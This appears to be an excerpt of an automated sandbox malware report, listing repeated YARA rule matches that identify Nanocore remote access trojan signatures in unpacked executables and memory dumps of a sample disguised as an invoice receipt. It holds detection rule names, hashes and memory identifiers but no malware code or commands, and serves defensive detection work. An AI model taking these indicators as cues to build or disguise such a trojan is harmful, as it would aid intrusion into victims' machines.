Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.37b0e54.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.37b0e54.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.3733258.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.3733258.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.3733258.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.415058.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.chmac.exe.396547d.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.396547d.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.38e3258.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.38e3258.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.38e3258.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.1.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.chmac.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.415058.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.0.G2M8C76V_INV0ICE_RECEIPT.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.415058.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.chmac.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.chmac.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.0.chmac.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.2.chmac.exe.2540000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 15.2.chmac.exe.2540000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.2.chmac.exe.2540000.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.341257135.0000000003731000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000000.322700795.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000000.323810648.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000002.359331974.00000000024B0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.327158537.0000000003000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000002.358998677.0000000000644000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.341406619.0000000004832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.341081024.0000000002260000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
